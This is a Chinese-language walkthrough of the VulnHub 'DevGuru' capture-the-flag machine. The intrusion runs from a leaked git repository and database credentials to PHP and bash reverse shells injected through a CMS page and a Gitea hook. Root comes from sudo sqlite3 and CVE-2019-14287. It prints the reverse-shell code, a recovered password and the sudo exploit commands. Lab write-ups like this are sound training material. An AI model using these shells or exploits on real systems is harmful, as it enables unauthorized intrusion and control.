vulnhub系列:devguru
一、信息收集
nmap扫描存活,根据mac地址寻找IP
nmap 192.168.23.0/24
data:image/s3,"s3://crabby-images/084ed/084ed4b8df205b6c42e1a3a4b37690d8277c1597" alt=""
nmap扫描端口,开放端口:22、80、8585
nmap 192.168.23.147 -p- -sV -Pn -O
data:image/s3,"s3://crabby-images/138e9/138e9c4e4f80dfe40d50fcff820bfdffb5efbeb9" alt=""
访问80端口
data:image/s3,"s3://crabby-images/0ebd2/0ebd25b3731e8caf1b141b1fd95c156e0a9caf63" alt=""
dirb目录扫描,存在 git 源码、
dirb http://192.168.23.147/
data:image/s3,"s3://crabby-images/d3866/d3866ba5bf29a42602f10da819dc605b236f1913" alt=""
拼接发现数据库登录页面
data:image/s3,"s3://crabby-images/227d5/227d574d1595df10f6c361526e35110c1c587000" alt=""
发现登录页面
data:image/s3,"s3://crabby-images/09545/095451f75aba074c3b8322c03856ab8e6b116df0" alt=""
拼接/.git/config,发现8585端口的路径
data:image/s3,"s3://crabby-images/b64e1/b64e1329752527a50f3f974363ed26604591fbda" alt=""
拼接,是8585端口的页面
data:image/s3,"s3://crabby-images/c3f9f/c3f9f4e977e4629a73fe713f3ec35aa3f566dad8" alt=""
拼接/.git/description,提示通过编辑 description 库来命名数据库
data:image/s3,"s3://crabby-images/f1216/f1216b2bad7140f61fed9d2733b8c45bb6e407f2" alt=""
找不到其他东西,扫一下 8585 端口的目录
搜索框
data:image/s3,"s3://crabby-images/78428/7842808ef0eaff1ba4738d69d8e7667e9ebda954" alt=""
也没扫出什么东西,看一下80端口的 git 源码泄露,Githack 下载查看
data:image/s3,"s3://crabby-images/968f2/968f22f02eb3853d804b21cb49a05686892f6be7" alt=""
源码中发现 mysql 账号密码
data:image/s3,"s3://crabby-images/65ab2/65ab2e4b4852db371a115b893fffd94fcdcc497c" alt=""
成功登录数据库
data:image/s3,"s3://crabby-images/c79f8/c79f89d63c0fd2bb33156561487af8a8fe7c0f77" alt=""
发现 frank 用户,但是密码破解不出来,直接添加一个用户
data:image/s3,"s3://crabby-images/6e65f/6e65f2fb78443154797577b0f57712d1d0c8d474" alt=""
data:image/s3,"s3://crabby-images/fb62e/fb62e3ff7adc74db44c851005e0fc45c8ebef18a" alt=""
设置权限
data:image/s3,"s3://crabby-images/5749d/5749db5b697606987a23fbe445ca6adb8e32ac14" alt=""
添加用户后无法登录,john 解码发现密码为 bcrypt 加密发现密码,设置密码时需要选择 encrypt ,修改后成功登录
data:image/s3,"s3://crabby-images/597f2/597f235b03cd89faeadf752a65b7b35aac13a518" alt=""
二、getshell
在 cms -> pages 可以写入语句,这里我在 about 中写入语句
function onStart(){
$s=fsockopen("192.168.195.130",7777);
$proc=proc_open("/bin/sh -i", array(0=>$s, 1=>$s, 2=>$s),$pipes);
}
data:image/s3,"s3://crabby-images/b6fea/b6feadb20f09949da9e690673b3e379ea9b096c6" alt=""
kali监听4444端口,然后访问页面的about路径
data:image/s3,"s3://crabby-images/7fd73/7fd73add94576ea623f833d90b96a86b18d91b27" alt=""
成功反弹shell
data:image/s3,"s3://crabby-images/e0c7b/e0c7bebd58245143a91a416dbbf00bb05deb72c7" alt=""
三、提权
使用python提升交互性
python3 -c "import pty;pty.spawn('/bin/bash')"
data:image/s3,"s3://crabby-images/111a9/111a98b28a0cb5dee1c9dab1fb59a0ea275ba644" alt=""
尝试提权失败,/home 目录下有一个 frank 目录,也没有权限进入
/var/backups 下发现 app.ini.pak,查看内容
data:image/s3,"s3://crabby-images/919ac/919ace007f211312898b782260889585687ae835" alt=""
得到 gitea 账号密码
gitea:UfFPTF8C8jjxVF2m
返回 adminer.php 页面,登录
data:image/s3,"s3://crabby-images/1556b/1556b53c954797f4bf6c3c5a7168b74eda94dbcf" alt=""
user 表下发现 frank 用户,密码 bcrypt 加密
data:image/s3,"s3://crabby-images/0f57b/0f57b3582bbf700c47157c37baf275c4744c3d27" alt=""
将密码修改为同样 bcrypt 加密的,123456
https://www.bejson.com/encrypt/bcrpyt_encode/
$2a$10$vVQiseY5ZaYAwCcbgXJRpOxOhqXtXfN2SvsjW3vG3AXWw3R.LESIe
data:image/s3,"s3://crabby-images/71487/7148718ce35053ccdf859645184da2546db2e1eb" alt=""
将密码修改
data:image/s3,"s3://crabby-images/19a60/19a609ae1f77eb1a42e8d206afe18a3d5a577fcf" alt=""
访问 8585端口的 /user/login 进行登录
data:image/s3,"s3://crabby-images/fdcee/fdcee42ee675e152d4c4d6b27ef7576848cc6a4a" alt=""
data:image/s3,"s3://crabby-images/a95a8/a95a8c3f4f23546bace05ddc40879217ccf460dd" alt=""
登录后点击
data:image/s3,"s3://crabby-images/0d60b/0d60bb007c247143bdb64a72f1eefef805c50644" alt=""
data:image/s3,"s3://crabby-images/ea32a/ea32a32a246c433cfc581d0a88917d7fca35e40c" alt=""
在其中写入反弹 shell 语句
bash -c "exec bash -i >& /dev/tcp/192.168.23.133/4444 0>&1"
data:image/s3,"s3://crabby-images/421f5/421f5fc45c8599095160e9e050644e79e2e07193" alt=""
下方点击保存
data:image/s3,"s3://crabby-images/621ca/621cae526fcb07799db50438dcbc0957cee97ca5" alt=""
kali 开启监听
nc -lvnp 4444
data:image/s3,"s3://crabby-images/c744c/c744c8a6385754e65d2aea61896da78d2ff6f643" alt=""
返回前几个路径,随便修改一个文件,保存后即可反弹shell
data:image/s3,"s3://crabby-images/56684/56684209318e29a639a561e83649cffa25590599" alt=""
在 /home/frank 下发现第一个 flag 文件
data:image/s3,"s3://crabby-images/c2c4e/c2c4e01ccd15f71b8e4263c85ef597c8b4dd28f6" alt=""
查看当前权限
sudo -l
data:image/s3,"s3://crabby-images/6d997/6d997767176f5039079df5db8769c5e549bba4aa" alt=""
发现 sqlite3 命令能执行 root 权限,执行命令
sudo sqlite3 /dev/null '.shell /bin/sh'
提权失败,百度搜了一下,是由于 sudo 版本问题导致,查看 sudo 版本
sudo -V
data:image/s3,"s3://crabby-images/dcad5/dcad510fade600fe3e8fe34493c71a54d47f0946" alt=""
又查了一下,sudo 版本低于 1.8.27,存在 CVE-2019-14287 漏洞,执行命令,提权成功
sudo -u#-1 sqlite3 /dev/null '.shell /bin/sh'
data:image/s3,"s3://crabby-images/f333f/f333f84d135547f7879a85dd8192a22dbcb2d650" alt=""
在 /root 下发现第二个 flag
data:image/s3,"s3://crabby-images/eabc0/eabc0774a8a53c6d08923759726c7a0433bcdd29" alt=""